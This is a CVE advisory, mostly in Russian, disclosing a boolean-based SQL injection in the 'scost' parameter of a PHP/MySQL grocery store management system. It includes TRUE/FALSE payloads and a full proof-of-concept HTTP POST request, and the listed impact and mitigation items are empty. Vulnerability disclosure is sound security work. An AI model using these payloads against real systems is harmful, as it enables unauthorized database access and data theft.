
CVE-2026-37149 - SQL Injection vulnerability in the scost parameter of search_products.php in GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0.
CVE-2026-37149 SQL-инъекция в GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0
Обзор
CVE ID: CVE-2026-37149 Тип уязвимости: SQL-инъекция (CWE-89) Серьезность: Высокая Обнаружил: Dhyey Patel
Описание
GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 содержит уязвимость SQL-инъекции в параметре "scost" файла "/grocery/search_products.php".
Приложение не выполняет должную проверку вводимых пользователем данных перед их встраиванием в SQL-запросы. Злоумышленник может внедрить вредоносные SQL-выражения через уязвимый параметр и манипулировать запросами к базе данных.
Успешная эксплуатация может позволить несанкционированный доступ к конфиденциальной информации базы данных и выполнение произвольных SQL-запросов.
Затронутый продукт
Продукт: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN Версия: v1.0 Репозиторий разработчика: https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-
Затронутый компонент
Тип атаки Удаленная
Информация о разработчике Проект с открытым исходным кодом, поддерживаемый владельцем репозитория: https://github.com/anirudhkannanvp
Технические подробности
Уязвимость была подтверждена с помощью техники Boolean-based SQL-инъекции.
Полезная нагрузка для условия TRUE
-1 OR 321=6 AND 000483=000483 --
Полезная нагрузка для условия FALSE
-1 OR 320=6 AND 000483=000483 --
Ответы приложения различались в зависимости от того, было ли внедрённое условие TRUE или FALSE, что подтверждает SQL-инъекцию.
Дальнейшее тестирование подтвердило успешное выполнение SQL-функций, включая:
SELECT database()
Возвращённое имя базы данных:
grocery
Это демонстрирует, что через уязвимый параметр могут выполняться произвольные SQL-запросы.
Подтверждение концепции
Запрос
POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded
scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products
Результат
Ответ изменяется в зависимости от внедрённого булева условия, что подтверждает SQL-инъекцию в параметре "scost".
Воздействие
Потенциальные последствия включают:
Меры по смягчению
Разработчикам следует:
Ссылки OWASP SQL Injection https://owasp.org/www-community/attacks/SQL_Injection
MITRE CVE Program https://www.cve.org
Авторы Обнаружено и сообщено: Dhyey Patel